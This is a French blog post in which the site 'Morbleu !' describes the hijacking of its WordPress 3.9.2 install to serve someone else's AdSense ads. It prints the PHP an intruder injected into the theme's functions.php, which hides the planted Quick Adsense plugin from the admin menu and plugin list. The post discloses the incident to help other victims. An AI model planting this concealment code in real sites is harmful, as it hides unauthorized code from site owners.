WordPressGrâce à la sagacité de Luccio, Morbleu ! s’est aperçu que des publicités apparaissaient depuis quelques temps sur ses pages, et cela indépendamment de notre volonté.

Il semble que, malgré tous nos efforts de vigilance, nous ayant été les victimes d’une malveillance. Quelqu’un semble s’être introduit en nos pages autour du 27 octobre de cette année vers 10h30, et a modifié incidemment nos pages en glissant un code affichant des publicités.

Or, comme nous utilisons, Luccio et moi, un bloqueur de publicité sur nos navigateurs respectifs, nous n’avons pu nous rendre compte de cette tragédie avant ce jour. Le problème est désormais résolu, et les lecteurs de Morbleu ! peuvent désormais à nouveau savourer nos articles sans publicité aucune.

Nos lecteurs ne nous ont pas non plus alertés, soit qu’ils utilisassent également des bloqueurs de publicité, soit qu’ils pensassent que Morbleu ! était désormais (re)passé du côté obscur de l’entertainment culturel capitalistique grassement rémunéré par réclames, soit qu’ils désertassent depuis longtemps nos colonnes. Soit peut-être les trois en même temps : certains cumulent outrageusement les qualités.

Pour les fins techniciens, tout porte à croire que l’attaque fut la suivante :

Pour les encore plus techniciens, quelques détails encore plus techniques, que je donne ici dans l’espoir que cela puisse aider quelqu’un ayant connu pareille mésaventure :

  • La version de WordPress utilisée était le 3.9.2.
  • Une vulnérabilité permettait apparemment de télécharger sur le serveur certains fichiers.
  • Une extension, au demeurant parfaitement honorable, du doux nom de Quick Adsense, fut téléchargé, permettant d’afficher les odieuses publicités AdSense de Google − que nous ne voyions donc pas en raison de nos très performants bloqueurs de publicité.
  • Au passage, le code client de la vile personne possédant le compte AdSense au bénéfice duquel les publicité étaient affichées est le suivant : ca-pub-4136538743839209.
  • À l’évidence, nous ne sommes pas les seules victimes de ce hacker/cracker, si on en croit une simple recherche sur Google.
  • Le vil homme doit certainement forfaiter pour son profit personnel, affichant des publicités à l’insu du plein gré des propriétaires des sites les plus fréquentés de la planète, dont Morbleu !, en témoigne cette déconvenue, doit faire partie − également à l’insu de son plein gré.
  • Étant données ces informations, la vile personne peut sans doute être au moins partiellement identifiée. Mais le souci de la justice a parfois comme seul obstacle sur son chemin la flemme paralysant les lésés tel Batman par Mr Freeze.
  • Pour afficher les publicités, le fichier functions.php du thème utilisé fut lâchement modifié, en injectant à l’intérieur le code suivant :

    add_action( ‘admin_menu’, ‘awp_hide_settings’ );
    function awp_hide_settings() {
    remove_submenu_page( ‘options-general.php’, ‘quick-adsense.php’ );
    }
    function slickred_comment() {
    global $wp_list_table;
    $hidearr = array(‘quick-adsense/quick-adsense.php’);
    $myplugins = $wp_list_table->items;
    foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
    unset($wp_list_table->items[$key]);
    }
    }
    }

    add_action(‘pre_current_active_plugins’, ‘slickred_comment’);

    Code ayant pour fonction de masquer de façon sournoise l’affichage de cette extension dans l’administration de WordPress pour que les administrateurs ne se rendent compte de rien.

Nous sommes désormais passés sur la version 4.0.0 de WordPress, tout en nettoyant le code du site, autant que faire se peut. Les dégâts auraient pu être beaucoup plus grave. Nous nous en sortons, finalement, pas si mal.

Aujourd’hui, tout semble avoir été réparé. Nous prions nos lecteurs de nous excuser pour les désagréments, et les enjoignons dans le même temps à nous signaler tout comportement incertain de Morbleu ! advenant ces prochains temps.